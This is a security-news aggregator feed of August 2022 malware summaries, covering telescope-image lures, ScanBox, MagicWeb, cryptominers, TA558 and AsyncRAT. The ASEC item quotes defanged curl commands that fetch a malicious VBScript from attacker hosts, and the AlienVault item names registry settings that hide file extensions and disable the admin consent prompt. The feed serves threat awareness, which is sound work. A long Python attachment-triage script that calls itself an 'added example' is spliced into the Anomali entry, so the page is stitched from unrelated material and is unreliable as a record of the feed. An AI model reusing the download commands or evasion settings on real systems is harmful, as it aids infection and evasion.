What's new around the internet


Src Date (GMT) Title Description Tags Stories Notes
Blog.webp 2022-09-01 01:51:53 Malicious HWP File Disguised as a Happy Birthday Message (OLE Object) (direct link) The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of the malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl -H "user-agent: chrome/103.0.5060.134 safari/537.32" hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\vbtemp cmd /c cd > %appdata%\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\vbtemp Both commands save the script in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript code that performs functions such as registering to task... Malware
Blog.webp 2022-08-31 23:26:41 RAT Tool Disguised as Solution File (*.sln) Being Distributed on GitHub (direct link) The ASEC analysis team has recently discovered the distribution of a RAT tool disguised as a solution file (*.sln) on GitHub. As shown in Figure 1, the malware distributor is sharing source code on GitHub titled “Jpg Png Exploit Downloader Fud Cryter Malware Builder Cve 2022”. The file composition looks normal, but the solution file (*.sln) is actually a RAT tool. Through methods like this, the malware distributor lures users into running the RAT tool by... Malware Tool
DarkReading.webp 2022-08-31 18:00:00 James Webb Telescope Images Loaded With Malware Are Evading EDR (direct link) New Golang cyberattacks use deep space images and a new obfuscator to target systems undetected. Malware
SecurityAffairs.webp 2022-08-31 16:43:57 GO#WEBBFUSCATOR campaign hides malware in NASA's James Webb Space Telescope image (direct link) A malware campaign tracked as GO#WEBBFUSCATOR used an image taken from NASA's James Webb Space Telescope (JWST) as a lure. Securonix Threat researchers uncovered a persistent Golang-based malware campaign tracked as GO#WEBBFUSCATOR that leveraged the deep field image taken from the James Webb telescope. The phishing emails contain a Microsoft Office attachment that includes an external reference […] Malware Threat
InfoSecurityMag.webp 2022-08-31 16:00:00 Golang-based Malware Campaign Relies on James Webb Telescope's Image (direct link) Initial infection begins with a phishing email containing a Microsoft Office attachment. Malware
MalwarebytesLabs.webp 2022-08-31 15:00:00 James Webb telescope images used to hide malware (direct link) Categories: News, Threats. Tags: Msdllupdate.exe, macros, James Webb, certutil, Golang, base64, steganography, OxB36F8GEEC634.jpg. In a recent malware campaign, images from the James Webb telescope were used to hide malware. Malware
ArsTechnica.webp 2022-08-31 14:55:37 Apple quietly revamps malware scanning features in newer macOS versions (direct link) New version of XProtect is "as active as many commercial anti-malware products." Malware
The_Hackers_News.webp 2022-08-31 14:22:00 Hackers Hide Malware in Stunning Images Taken by James Webb Space Telescope (direct link) A persistent Golang-based malware campaign dubbed GO#WEBBFUSCATOR has leveraged the deep field image taken from NASA's James Webb Space Telescope (JWST) as a lure to deploy malicious payloads on infected systems. The development, revealed by Securonix, points to the growing adoption of Go among threat actors, given the programming language's cross-platform support, effectively allowing the Malware Threat
knowbe4.webp 2022-08-31 13:30:07 Lost in Translation? New Cryptomining Malware Attacks Based in Turkey Cause Suspicion (direct link) Malware
Mandiant.webp 2022-08-31 12:00:00 Announcing the 9th Annual Flare-On Challenge (direct link) The FLARE team is once again hosting the Flare-On challenge this year. Put your skills to the test, and pick up some new ones along the way, in this single-player reverse engineering challenge. The contest will begin at 8:00 p.m. ET on Sept. 30, 2022. This is a CTF-style challenge for all active and aspiring reverse engineers, malware analysts, and security professionals. The contest runs for six full weeks and ends at 8:00 p.m. ET on Nov. 11, 2022. This year's contest will feature a total of 11 challenges featuring a variety of formats including Windows, JavaScript, .NET, Python, and even Malware ★★★
The_Hackers_News.webp 2022-08-31 07:23:00 Chinese Hackers Used ScanBox Framework in Recent Cyber Espionage Attacks (direct link) A months-long cyber espionage campaign undertaken by a Chinese nation-state group targeted several entities with reconnaissance malware so as to glean information about its victims and meet its strategic goals. "The targets of this recent campaign spanned Australia, Malaysia, and Europe, as well as entities that operate in the South China Sea," enterprise security firm Proofpoint said in a Malware
Nozomi.webp 2022-08-30 20:41:00 Automatic Restoration of Corrupted UPX-packed Samples (direct link) Nozomi Networks Labs scans the web on a daily basis and monitors new techniques that Internet of Things (IoT) malware developers introduce to deceive automated code analysis systems. In most cases, these threats are relatively simple and can be easily bypassed when the sample is manually analyzed in the debugger. However, it can be a […] Malware
TroyHunt.webp 2022-08-30 19:04:28 Organizations are spending billions on malware defense that's easy to bypass (direct link) Two of the simplest forms of evasion are surprisingly effective against EDRs. Malware
bleepingcomputer.webp 2022-08-30 18:08:01 Hackers hide malware in James Webb telescope images (direct link) Threat analysts have spotted a new malware campaign dubbed 'GO#WEBBFUSCATOR' that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware. [...] Malware Threat
InfoSecurityMag.webp 2022-08-30 14:20:00 Cryptominer Disguised as Google Translate Targeted 11 Countries (direct link) Created by a Turkish-speaking entity, the malware claimed around 111,000 victims in 11 countries. Malware
bleepingcomputer.webp 2022-08-30 13:26:40 Chinese hackers target Australian govt with ScanBox malware (direct link) China-based threat actors have been targeting Australian government agencies and wind turbine fleets in the South China Sea by directing select individuals to a fake site impersonating an Australian news media outlet. [...] Malware Threat
no_ico.webp 2022-08-30 12:25:24 LinkedIn New Hacking Scam (direct link) Microsoft-owned LinkedIn is being used by hackers to spread data-stealing malware by sending connection requests disguised as coming from people working at reputable companies, a report showed on Tuesday. Researchers found that scammers are exploiting LinkedIn's chat and job posting features to share links and files that are laced with stealer malware. Since most LinkedIn users accept […] Malware
News.webp 2022-08-30 10:27:12 That 'clean' Google Translate app is actually Windows crypto-mining malware (direct link) Ah, nothing like a classic Trojan horse. Watch out: someone is spreading cryptocurrency-mining malware disguised as legitimate-looking applications, such as Google Translate, on free software download sites and through Google searches.… Malware
2022-08-30 08:00:09 ModernLoader delivers multiple stealers, cryptominers and RATs (direct link) By Vanja Svajcer. Cisco Talos recently observed three separate, but related, campaigns between March and June 2022 delivering a variety of threats, including the ModernLoader bot, the RedLine information stealer and cryptocurrency-mining malware, to victims. The actors use PowerShell, .NET assemblies, and HTA and VBS files to spread across a targeted network, eventually dropping other pieces of malware, such as the SystemBC trojan and DCRAT, to enable various stages of their operations. The attackers' use of a variety of off-the-shelf tools makes it difficult to attribute this activity to a specific adversary. The final payload appears to be ModernLoader, which acts as a remote access trojan (RAT) by collecting system information and deploying various modules. In the earlier campaigns from March, we also observed the attackers delivering the cryptocurrency-mining malware XMRig. The March campaigns appeared to be targeting Eastern European users, as the constructor utility we analyzed had predefined script templates written in Bulgarian, Polish, Hungarian and Russian. The actors are attempting to compromise vulnerable web applications to serve malware and deliver threats via files masquerading as fake Amazon gift cards. Technical details. Initial findings: In June 2022, Cisco Talos identified an unusual command line execution in our telemetry. The decoded base64 command is below: (Figure: Initial finding: A command executed on the system.) The 31.41.244[.]231 IP is a Russian IP and hosts several other URLs with similar naming conventions. Autostart command: Following the discovery of the initial command, we identified two other command lines. They are the result of an autorun-registered executable and the execution of a scheduled task. Malware Tool Threat Yahoo
CSO.webp 2022-08-30 03:37:00 Multi-stage crypto-mining malware hides in legitimate apps with month-long delay trigger (direct link) Researchers have discovered a new multi-stage malware delivery campaign that relies on legitimate application installers distributed through popular software download sites. The malicious payload delivery, which includes a cryptocurrency mining program, is done in stages with long delays that can add up to almost a month. "After the initial software installation, the attackers delayed the infection process for weeks and deleted traces from the original installation," researchers from security firm Check Point Software Technologies said in a new report. "This allowed the campaign to successfully operate under the radar for years." Malware
bleepingcomputer.webp 2022-08-29 13:19:02 Windows malware delays coinminer install by a month to evade detection (direct link) A new malware campaign disguised as Google Translate or MP3 downloader programs was found distributing cryptocurrency mining malware across 11 countries. [...] Malware
SecurityAffairs.webp 2022-08-29 13:11:48 Nitrokod crypto miner infected systems across 11 countries since 2019 (direct link) Researchers spotted a Turkey-based crypto miner malware campaign, tracked as Nitrokod, which infected systems across 11 countries. Check Point researchers discovered a Turkey-based crypto miner malware campaign, dubbed Nitrokod, which infected machines across 11 countries. The threat actors dropped the malware from popular software available on dozens of free software websites, including Softpedia and […] Malware Threat
AlienVault.webp 2022-08-29 10:00:00 Crypto miners' latest techniques (direct link) Executive summary: Crypto miners are determined in their objective of mining on other people's resources. Proof of this is one of the latest samples identified by AT&T Alien Labs, with at least 100 different loaders and at least 4 different stages to ensure their miner and backdoor run smoothly on the infected systems. Key takeaways: Attackers have been sending malicious attachments, with a special emphasis on Mexican institutions and citizens. The techniques observed in these samples are known but still effective at infecting victims with their miners. Reviewing them reminds defenders of the current trends and how to improve their defenses. The wide variety of loaders, in conjunction with the staged delivery of the miner and backdoor malware, shows how determined the attackers are to successfully deliver their payloads. Analysis: Crypto miners have been present in the threat landscape for some years, since attackers identified the opportunity of leveraging victims' CPUs to mine cryptocurrencies for them. Despite the current rough patch in the world of cryptocurrencies, these miners are still present and will be for the foreseeable future. As seen in the current analysis, unlike IoT malware, which also attempts to reach the largest possible number of infected devices, these miners target victims through phishing samples. The techniques used by this malware are usually focused on reaching execution, avoiding detection to run under the radar, and gaining persistence to survive any reboot. A new miner sample showed up in April on the AT&T Alien Labs radar, with a wide range of different loaders aiming to execute it on infected systems up to this day. The loaders were initially delivered to the victims through an executable disguised as a spreadsheet.
For example, one of the samples (fd5131645025e199caa142c12cef34b344437a0f58306f9b66c35d32618665ba) carries a Microsoft Excel icon, but its file extension corresponds to an executable. A wide range of decoy documents were found associated with this miner, many of them related to Mexican civilians: exam results, dentist results, Mexican Governmental documents, Mexican Social Security, tax returns, etc. Figure 1 corresponds to one of the spreadsheets observed. The campaign identified in this report materialized most of its attacks during the second half of June 2022. For example, the file mentioned above was compiled in late May 2022 and was first observed in the wild a month later, on June 20, 2022. Figure 1. Decoy spreadsheet ‘ppercepciones anuales.xlsx’. At the time of execution, the first activities performed are registry changes to cloak the malware samples. For example, by setting ‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt’ to 1, the attackers are hiding the file extensions and camouflaging the executables as documents. Additionally, the registry key ‘HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden’ is set to 0 to avoid displaying in Explorer the hidden files dropped during execution. Finally, ‘HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin’ is set to 0 in order to execute any future samples with elevated privileges without explicit consent in the form of a pop-up or entering credentials. The initial payload drops another executable file while opening the spreadsheet in Figure 1. This additional executable attempts to look like a legitimate executable. It is named ‘CmRccService.exe’ and has the same filename as the metadata associated with the product's name, description and comments. It is probably an attempt to masquerade the process by making it simila Malware Threat
Cisco.webp 2022-08-29 08:43:08 Black Hat USA 2022 Continued: Innovation in the NOC (direct link) Cisco is a Premium Partner of the Black Hat NOC, and is the Official Wired & Wireless Network Equipment, Mobile Device Management, DNS (Domain Name Service) and Malware Analysis Provider of Black Hat. Malware ★★★
CyberSkills.webp 2022-08-29 00:00:00 New cyber security certificate offers SMEs a pathway to greater business resilience and online savviness (direct link) Chair of Cybersecurity in Munster Technological University, Dr. Donna O'Shea, and Head of School of Informatics & Cybersecurity at TU Dublin, Dr. Anthony Keane, contributed to this article in the Independent.ie. In recent years, cyber security has emerged as a key issue for businesses in Ireland and across the world. Small enterprises are exposed to the same digital threats as larger businesses, but may lack the resources to defend themselves. It has been estimated that almost half of SMEs that suffer a serious cyber attack can go out of business within months. Enhanced cyber security is a matter of great societal importance, because SMEs operating in myriad industries such as retail, health care and construction are the backbone of the Irish economy. They constitute 99pc of all businesses and account for more than half of EU Gross Domestic Product (GDP). SMEs play a vital role in adding value to all sectors of the economy, but they may lack essential skills on how to protect their businesses, which are often heavily dependent on digital systems that are vulnerable to cyber-attacks. The urgency of addressing this skills gap was highlighted by the COVID-19 pandemic, which forced many businesses online, exposing them to a higher risk of cyber attacks with little support available. Irish businesses operating online often possess a low cyber security awareness, have inadequate knowledge of GDPR requirements in the protection of critical and sensitive information, and have a low level of Information and Communications Technology (ICT) skills to protect their business. They can also experience significant budgetary constraints that lead them to view cyber security as a relatively significant cost, rather than an important investment in their business resilience. In addition, many SMEs have direct and indirect business relationships with larger organisations.
For this reason, cyber criminals often focus on SMEs as a gateway into the larger organisations, knowing that these smaller businesses' cyber awareness and defensive structures are typically less robust than those of the criminals' larger targets. Recently, the National Cyber Security Centre (NCSC) and the Garda National Crime Bureau have written to the Small Firms Association to warn business owners of the ongoing series of ransomware attacks. They have observed a growing trend of small and medium-sized enterprises being targeted by cybercrime groups with ransomware, malicious software that is designed to block access to a computer system. Another common cyber crime tactic is threatening to leak sensitive stolen data unless a sum of money is paid. The NCSC said it has noticed a change in tactics whereby hackers are now turning their attention away from big business and Government departments, towards smaller businesses. Providing businesses with cyber skills. Professor Donna O'Shea is Chair of Cybersecurity in Munster Technological University and currently leads a Higher Education Authority (HEA) Human Capital Initiative (HCI) project called CYBER-SKILLS: a nationally funded project in collaboration with University of Limerick, Technological University (TU) Dublin, and Commonwealth Cyber Initiative, Virginia Tech U.S. This ground-breaking initiative aims to address the cybersecurity skills challenge in Irish SMEs. Prof. O'Shea says, “Growing up, my family owned an electrical retail store, so I really understood the challenges that small businesses face, their limitations in terms of time and how cost can sometimes be a barrier.
When designing the course Certificate in Cybersecurity for Business for CYBER-SKILLS, we really wanted a pathway to be open to everyone and we wanted to reduce the barriers to participating in the course, by reducing the cost, making it flexible in delivery, focusing on applied skills and providing the essential necessary knowledge and skills to protect small businesses everywhere against cyber attacks.” Irish professionals and businesses have expressed a growing interest in cybersecurity courses and careers, as borne out by the recen Ransomware Data Breach Malware Patching Prediction Cloud ★★
bleepingcomputer.webp 2022-08-27 11:14:07 Fake 'Cthulhu World' P2E project used to push info-stealing malware (direct link) Hackers have created a fake 'Cthulhu World' play-to-earn community, including websites, Discord groups, social accounts, and a Medium developer site, to distribute the Raccoon Stealer, AsyncRAT, and RedLine password-stealing malware infections on unsuspecting victims. [...] Malware
DarkReading.webp 2022-08-26 13:18:17 Endpoint Protection / Antivirus Products Tested for Malware Protection (direct link) Six out of the eight products achieved an "A" rating or higher for blocking malware attacks. Reports are provided to the community for free. Malware
The_Hackers_News.webp 2022-08-25 18:54:00 Microsoft Uncovers New Post-Compromise Malware Used by Nobelium Hackers (direct link) The threat actor behind the SolarWinds supply chain attack has been linked to yet another "highly targeted" post-exploitation malware that could be used to maintain persistent access to compromised environments. Dubbed MagicWeb by Microsoft's threat intelligence teams, the development reiterates Nobelium's commitment to developing and maintaining purpose-built capabilities. Nobelium is the tech Malware Threat
bleepingcomputer.webp 2022-08-25 18:33:35 How 'Kimsuky' hackers ensure their malware only reaches valid targets (direct link) The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers. [...] Malware Threat
SecurityAffairs.webp 2022-08-25 17:11:38 Nobelium APT uses new post-compromise malware MagicWeb (direct link) Russia-linked APT group Nobelium is behind a new sophisticated post-exploitation malware tracked by Microsoft as MagicWeb. Microsoft security researchers discovered a post-compromise malware, tracked as MagicWeb, which is used by the Russia-linked NOBELIUM APT group to maintain persistent access to compromised environments. The NOBELIUM APT (APT29, Cozy Bear, and The Dukes) is the threat actor that […] Malware Threat APT 29
The_Hackers_News.webp 2022-08-25 15:55:00 Researchers Uncover Kimsuky Infra Targeting South Korean Politicians and Diplomats (direct link) The North Korean nation-state group Kimsuky has been linked to a new set of malicious activities directed against political and diplomatic entities located in its southern counterpart in early 2022. Russian cybersecurity firm Kaspersky codenamed the cluster GoldDragon, with the infection chains leading to the deployment of Windows malware designed to file lists, user keystrokes, and stored web Malware Guideline
CS.webp 2022-08-25 13:13:21 Ransomware attacks jump as new malware strains proliferate, research finds (direct link) Ransomware cases increased 47 percent amid a rise in attacks involving new strains of malware from the LockBit cybercrime syndicate. Malware
bleepingcomputer.webp 2022-08-25 12:36:49 Microsoft: Russian malware hijacks ADFS to log in as anyone in Windows (direct link) Microsoft has discovered a new malware used by the Russian hacker group APT29 (a.k.a. NOBELIUM, Cozy Bear) that enables authentication as anyone in a compromised network. [...] Malware APT 29 ★★★
Minerva.webp 2022-08-25 10:23:06 STOP/DJVU Ransomware (direct link) STOP/DJVU ransomware has been with us since 2019. New versions are released periodically; however, the new STOP/DJVU ransomware versions usually focus on adding new encrypted file extensions. There were almost 200 different encryption extensions observed in the wild through 2019 alone. This ransomware contains a lot of unused code, probably inserted to delay malware […] Ransomware Malware ★★★
SecurityWeek.webp 2022-08-25 10:16:06 Microsoft Details New Post-Compromise Malware Used by Russian Cyberspies (direct link) Microsoft this week published technical details on 'MagicWeb', a new post-exploitation tool used by Russia-linked cyberespionage group APT29. Malware Tool APT 29
News.webp 2022-08-25 09:24:07 Shout-out to whoever went to Black Hat with North Korean malware on their PC (direct link) I am the one who NOCs. The folks tasked with defending the Black Hat conference network see a lot of weird, sometimes hostile activity, and this year it included malware linked to Kim Jong-un's agents.… Malware
bleepingcomputer.webp 2022-08-25 07:18:40 PyPI packages hijacked after developers fall for phishing emails (direct link) A phishing campaign caught yesterday was seen targeting maintainers of Python packages published to the PyPI registry. Python packages 'exotel' and 'spam' are among hundreds seen laced with malware after attackers successfully compromised accounts of maintainers who fell for the phishing email. [...] Malware
CSO.webp 2022-08-25 06:00:00 DNS data indicates increased malicious domain activity, phishing toolkit reuse (direct link) New research from cybersecurity vendor Akamai has revealed that 12.3% of monitored devices communicated with domains associated with malware or ransomware at least once during the second quarter of 2022. This represented a 3% increase compared to Q1 2022, the firm stated, with phishing toolkits playing a key role in malicious domain-related activity. The findings are based on DNS data and Akamai's visibility into carrier and enterprise traffic across different industries and geographies. Increased malware, phishing, C2 domain activity detected in Q2 2022: In a blog post detailing its research, Akamai stated that, in addition to the devices it detected communicating with domains associated with malware/ransomware, a further 6.2% of devices accessed phishing domains, with 0.8% accessing command-and-control (C2)-associated domains (both small increases on Q1 2022). “While this number might seem insignificant, the scale here is in the millions of devices,” the firm wrote. “When this is considered, with C2 being the most malignant of threats, this is not only significant, it's cardinal.” Ransomware Malware
DarkReading.webp 2022-08-24 19:29:23 Efficient 'MagicWeb' Malware Subverts AD FS Authentication, Microsoft Warns (direct link) The Russia-backed Nobelium APT has pioneered a post-exploitation tool allowing attackers to authenticate as any user. Malware Tool
DarkReading.webp 2022-08-24 13:46:20 CyberRatings.org Announces New Web Browser Test Results for 2022 (direct link) Three of the world's leading browsers were measured for phishing and malware protection, with time to block and protection over time as key metrics in test scores. Malware Guideline
2022-08-24 12:50:34 Ukraine Independence Day: Talos update (direct link) On Independence Day for Ukraine, Aug. 24, 2022, Cisco Talos provided a live update on its continued support for the region. Six months into Russia's invasion of Ukraine, Dmytro Korzhevin, a senior threat intelligence researcher, JJ Cummings, Talos' national intelligence principal, and Ashlee Benge, a strategic intelligence lead, provided insights into their past few months of work in the region. The discussion primarily focused on the resiliency of Ukrainians, who have worked tirelessly over the years to transform their cybersecurity capabilities. Ukrainian infrastructure has largely stayed operational and, in most cases, exceeded expectations. It seems to have baffled most pundits, but for those who have spent years working in Ukraine, the level of dedication and commitment to protecting their critical infrastructure from those who would do it harm comes as no surprise. The team also covered how groundwork laid years ago is paying dividends now during the war, as well as an update on the types of cyber threats we're observing, including the deployment of the GoMet backdoor. At the beginning of the broadcast, Korzhevin shared what Independence Day of Ukraine means for him. "Independence is not an extra day off, but a value that should be used for the benefit of every citizen of our country," he added after the stream. "Independence is the will. Independence lives in every person. If we are independent, it means that we are free. That is, we live, not exist. The same goes for the state. Independence of Ukraine is when we have the possibility to develop the state as we want it and not as we are told, when we have a real own history and not a twisted one, when we speak our native language and not a hostile one. And now that there is a war in Ukraine, the most important task of our people is to preserve Independence.
So that we, our children, grandchildren and all future generations of Ukrainians could live and build our state based on national traditions and core democratic values. Independence is primarily a way, not a condition. I believe that we will overcome all the difficulties in this way." Benge added that Cisco and Talos have several resources available to any organizations in Ukraine that are in need of assistance. "If you are an organization in Ukraine who is interested in having Talos' help, and you would like to participate in our threat hunting program, please reach out via our social channels," she said. "We are offering our security products for free to Ukrainian organizations, as it's important to us to continue to support Ukraine throughout the duration of the conflict." A recording of the broadcast is available. In our continued efforts to support Ukraine, the following blogs have been translated into Ukrainian: Current executive guidance for ongoing cyberattacks in Ukraine; Talos on the developing situation in Ukraine; Cisco stands on guard with our customers in Ukraine; Threat Advisory: Opportunistic Malware Threat Guideline ★★★★
CVE.webp 2022-08-24 12:15:08 CVE-2022-33172 (direct link) de.fac2 1.34 allows bypassing the User Presence protection mechanism when there is malware on the victim's PC. Malware ★★★
The_Hackers_News.webp 2022-08-24 05:12:00 Hackers Using Fake DDoS Protection Pages to Distribute Malware (direct link) WordPress sites are being hacked to display fraudulent Cloudflare DDoS protection pages that lead to the delivery of malware such as NetSupport RAT and Raccoon Stealer. "A recent surge in JavaScript injections targeting WordPress sites has resulted in fake DDoS prevention prompts which lead victims to download remote access trojan malware," Sucuri's Ben Martin said in a write-up published last week. Malware Guideline
Blog.webp 2022-08-24 05:02:44 AsyncRAT Being Distributed in Fileless Form (direct link) The ASEC analysis team has recently discovered that malicious AsyncRAT code is being distributed in fileless form. The distributed AsyncRAT is executed in fileless form through multiple script files and is thought to be distributed as a compressed file attachment in emails. AsyncRAT is an open-source RAT malware developed with .NET that can execute various malicious activities under the command of the attacker. The compressed file being distributed through phishing emails contains an HTML file, and executing this file will... Malware
bleepingcomputer.webp 2022-08-23 18:02:04 Pirated 3DMark benchmark tool delivering info-stealer malware (direct link) Cybersecurity researchers have discovered multiple ongoing malware distribution campaigns that target internet users who seek to download copies of pirated software. [...] Malware Tool
Anomali.webp 2022-08-23 17:35:00 Anomali Cyber Watch: Emissary Panda Adds New Operating Systems to Its Supply-Chain Attacks, Russia-Sponsored Seaborgium Spies on NATO Countries, TA558 Switches from Macros to Container Files, and More (direct link) The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: China, Cyberespionage, DDoS, Russia, Spearphishing, Supply chain, Taiwan, and Ukraine. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity. Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence. Reservations Requested: TA558 Targets Hospitality and Travel (published: August 18, 2022) Since 2018, the financially motivated threat group TA558 has targeted hospitality and travel with reservation-themed, business-relevant phishing emails. The group concentrates on targeting Latin America using lures written in Portuguese and Spanish, and sometimes uses English and wider targeting (North America, Western Europe). TA558 was seen leveraging at least 15 different malware payloads, most often AsyncRAT, Loda RAT, Revenge RAT, and Vjw0rm. In 2022, Proofpoint researchers detected that TA558 increased its activity and moved from using malicious macros to URLs and container files (ISO, RAR). Analyst Comment: Microsoft's preparations to disable macros by default in Office products caused multiple threat groups, including TA558, to adopt new file types to deliver payloads. It is crucial for personnel working with invoices and other external attachments to use updated, secured systems and to be trained on phishing threats. Anomali Match can be used to quickly search your infrastructure for known TA558 IOCs.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 Tags: TA558, AsyncRAT, Loda, RAT, Vjw0rm, BluStealer, Revenge RAT, XtremeRAT, Hospitality, Travel, Phishing, ISO, RAR, PowerShell, CVE-2017-11882, CVE-2017-8570 Estonia Subjected to 'Extensive' Cyberattacks after Moving Soviet Monuments (published: August 18, 2022) On August 17, 2022, Russian hacktivist group KillNet launched distributed denial-of-service (DDoS) attacks targeting Estonia. The Estonian government confirmed receiving the “most extensive” DDoS attacks in 15 years, but stressed that all services are back online after just some minor interruptions. Small and medium-sized DDoS attacks targeted 16 state and private organizations in the country, with seven of them experiencing downtime as a result. Specifically, the Estonian Tax and Customs Board website was unavailable for about 70 minutes. Analyst Comment: Russian cyber activity follows political tensions, this time coinciding with the removal of a Red Army memorial. Estonia seemingly easily fended off this Russian DDoS attack, but the country is one of the top in cyber preparedness, and Russia limited it’s strike to using hacktivist groups that give plausible deniability when attributing the cyber attack on a NATO country. Organizations that rely on stable work of their I Ransomware Malware Tool Threat APT 27
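The TA558 item above reports a move from macro-laden Office documents to ISO and RAR container files as mail attachments. The attachment-triage script below is an added example, not code from Anomali, Proofpoint or this feed. It assumes a mail gateway hands it attachment file names and raw bytes; the sample attachments are constructed in memory and are not real samples. The point it demonstrates is to classify by content signature rather than by extension, so a renamed ISO is still recognised, and to treat an extension/content mismatch as a signal in its own right.

```python
"""Attachment triage for the macro-to-container shift (added example, not from the page)."""
import io
import zipfile

# Signatures used (from the public format specs):
#   ISO 9660: volume descriptor magic "CD001" at byte 0x8001 (sector 16, after the type byte)
#   RAR 4.x:  "Rar!\x1a\x07\x00"   RAR 5: "Rar!\x1a\x07\x01\x00" (both share the 6-byte prefix)
#   OLE2 (legacy .doc/.xls/.ppt): D0 CF 11 E0 A1 B1 1A E1
#   OOXML (.docx/.docm/...): a ZIP; a vbaProject.bin part means the document carries macros
EXPECTED_EXT = {
    "rar": {"rar"}, "iso": {"iso", "img"}, "ole2": {"doc", "xls", "ppt"},
    "zip": {"zip"}, "ooxml": {"docx", "xlsx", "pptx"}, "ooxml_macro": {"docm", "xlsm", "pptm"},
}


def classify_attachment(name: str, data: bytes) -> dict:
    """Return a verdict for one attachment based on its content, not its extension."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    kind, reasons = "unknown", []

    if data.startswith(b"Rar!\x1a\x07"):
        kind = "rar"
    elif len(data) > 0x8006 and data[0x8001:0x8006] == b"CD001":
        kind = "iso"
    elif data.startswith(b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"):
        kind = "ole2"
    elif data.startswith(b"PK\x03\x04"):
        kind = "zip"
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                names = [n.lower() for n in zf.namelist()]
            if any(n.endswith("vbaproject.bin") for n in names):
                kind = "ooxml_macro"
            elif any(n.startswith(("word/", "xl/", "ppt/")) for n in names):
                kind = "ooxml"
        except zipfile.BadZipFile:
            reasons.append("ZIP header present but archive does not parse")

    # A renamed container (e.g. "invoice.pdf" that is really an ISO) is a classic lure.
    if kind in EXPECTED_EXT and ext not in EXPECTED_EXT[kind]:
        reasons.append(f"extension .{ext} does not match content type {kind}")
    if kind in ("iso", "rar"):
        reasons.append("container file delivered by mail (the TA558-style switch away from macros)")
    if kind in ("ooxml_macro", "ole2"):
        reasons.append("macro-capable Office document")

    mismatch = any("does not match" in r for r in reasons)
    if kind in ("iso", "rar", "ooxml_macro") or mismatch:
        severity = "high"
    elif kind == "ole2":
        severity = "medium"
    else:
        severity = "low"
    return {"name": name, "kind": kind, "severity": severity, "reasons": reasons}


def _iso_blob() -> bytes:
    """Constructed minimal ISO 9660 image: zeros with a primary volume descriptor header at sector 16."""
    buf = bytearray(0x8000 + 2048)
    buf[0x8000] = 1                      # descriptor type 1 = primary volume descriptor
    buf[0x8001:0x8006] = b"CD001"
    return bytes(buf)


def _macro_docx_blob() -> bytes:
    """Constructed OOXML container carrying a (dummy) vbaProject.bin part."""
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\x00" * 16)
    return out.getvalue()


# Constructed sample attachments, mimicking the reservation-themed lures in the story.
SAMPLE_ATTACHMENTS = {
    "Reserva_Hotel_2022.iso": _iso_blob(),
    "invoice.rar": b"Rar!\x1a\x07\x01\x00" + b"\x00" * 32,
    "booking.docm": _macro_docx_blob(),
    "itinerary.pdf": _iso_blob(),        # an ISO renamed to look like a PDF
    "terms.txt": b"plain text, nothing to see",
}


def triage_all(attachments=SAMPLE_ATTACHMENTS) -> list:
    return [classify_attachment(n, d) for n, d in attachments.items()]


if __name__ == "__main__":
    for v in triage_all():
        print(f"{v['severity']:6} {v['kind']:12} {v['name']:24} {'; '.join(v['reasons'])}")
```

The extension table and severity scale are assumptions for the example; in a real gateway they would be policy inputs. Note that a legacy OLE2 document is only rated medium because the signature alone does not prove it contains a macro stream, whereas a vbaProject.bin part inside an OOXML ZIP does.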
DarkReading.webp 2022-08-23 16:15:00 One-Third of Popular PyPI Packages Mistakenly Flagged as Malicious (lien direct) The scans used by the Python Package Index (PyPI) to find malware fail to catch 41% of bad packages, while creating plentiful false positives. Malware
Cisco.webp 2022-08-23 13:00:16 Announcing SOC 2 Compliance for Cisco Secure Endpoint, Cisco Secure Malware Analytics, and Cisco SecureX (lien direct) We are excited to announce that we have achieved SOC 2 compliance for the Cisco Secure Endpoint solution, Cisco Malware Analytics, and the Cisco SecureX platform! SOC 2 is a compliance framework developed by the American Institute of Certified Public Accountants (AICPA) that helps ensure organizations responsibly handle customer data Malware
itsecurityguru.webp 2022-08-23 11:12:43 (Déjà vu) Counterfeit Phones Found to Contain Backdoor to Hack WhatsApp (lien direct) Budget Android device models that are counterfeit versions of popular smartphone brands contain multiple hidden trojans designed to target the WhatsApp and WhatsApp Business messaging apps. Doctor Web first came across the malware in July 2022. It was discovered in the system partition of at least four different smartphones: radmi note 8, P48pro, Note30u, and […] Malware Hack
The_Hackers_News.webp 2022-08-23 07:50:00 Google Uncovers Tool Used by Iranian Hackers to Steal Data from Email Accounts (lien direct) The Iranian government-backed actor known as Charming Kitten has added a new tool to its malware arsenal that allows it to retrieve user data from Gmail, Yahoo!, and Microsoft Outlook accounts. Dubbed HYPERSCRAPE by Google Threat Analysis Group (TAG), the malicious software, which is still under active development, is said to have been used against fewer than two dozen accounts in Iran, with the oldest known Malware Tool Threat Conference Yahoo APT 35
Last update at: 2024-07-07 15:08:03
See our sources.
To see everything: Our RSS (filtered) Twitter